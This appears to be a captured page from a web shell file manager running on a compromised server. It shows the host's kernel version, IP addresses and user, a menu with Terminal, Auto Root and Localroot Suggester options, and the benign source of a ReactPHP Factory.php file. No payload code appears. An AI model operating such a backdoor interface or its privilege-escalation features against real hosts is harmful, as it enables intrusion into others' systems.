Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.14.152.212
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
vendor /
react /
event-loop /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Tick
[ DIR ]
drwxr-xr-x
2020-01-01 18:39
Timer
[ DIR ]
drwxr-xr-x
2020-01-01 18:39
ExtEvLoop.php
5.82
KB
-rw-r--r--
2020-01-01 18:39
ExtEventLoop.php
7.96
KB
-rw-r--r--
2020-01-01 18:39
ExtLibevLoop.php
5.45
KB
-rw-r--r--
2020-01-01 18:39
ExtLibeventLoop.php
8.36
KB
-rw-r--r--
2020-01-01 18:39
ExtUvLoop.php
9
KB
-rw-r--r--
2020-01-01 18:39
Factory.php
1.32
KB
-rw-r--r--
2020-01-01 18:39
LoopInterface.php
18.24
KB
-rw-r--r--
2020-01-01 18:39
SignalsHandler.php
1.28
KB
-rw-r--r--
2020-01-01 18:39
StreamSelectLoop.php
10.68
KB
-rw-r--r--
2020-01-01 18:39
TimerInterface.php
492
B
-rw-r--r--
2020-01-01 18:39
Save
Rename
<?php namespace React\EventLoop; /** * The `Factory` class exists as a convenient way to pick the best available event loop implementation. */ final class Factory { /** * Creates a new event loop instance * * ```php * $loop = React\EventLoop\Factory::create(); * ``` * * This method always returns an instance implementing `LoopInterface`, * the actual event loop implementation is an implementation detail. * * This method should usually only be called once at the beginning of the program. * * @return LoopInterface */ public static function create() { // @codeCoverageIgnoreStart if (\function_exists('uv_loop_new')) { // only use ext-uv on PHP 7 return new ExtUvLoop(); } elseif (\class_exists('libev\EventLoop', false)) { return new ExtLibevLoop(); } elseif (\class_exists('EvLoop', false)) { return new ExtEvLoop(); } elseif (\class_exists('EventBase', false)) { return new ExtEventLoop(); } elseif (\function_exists('event_base_new') && \PHP_MAJOR_VERSION === 5) { // only use ext-libevent on PHP 5 for now return new ExtLibeventLoop(); } return new StreamSelectLoop(); // @codeCoverageIgnoreEnd } }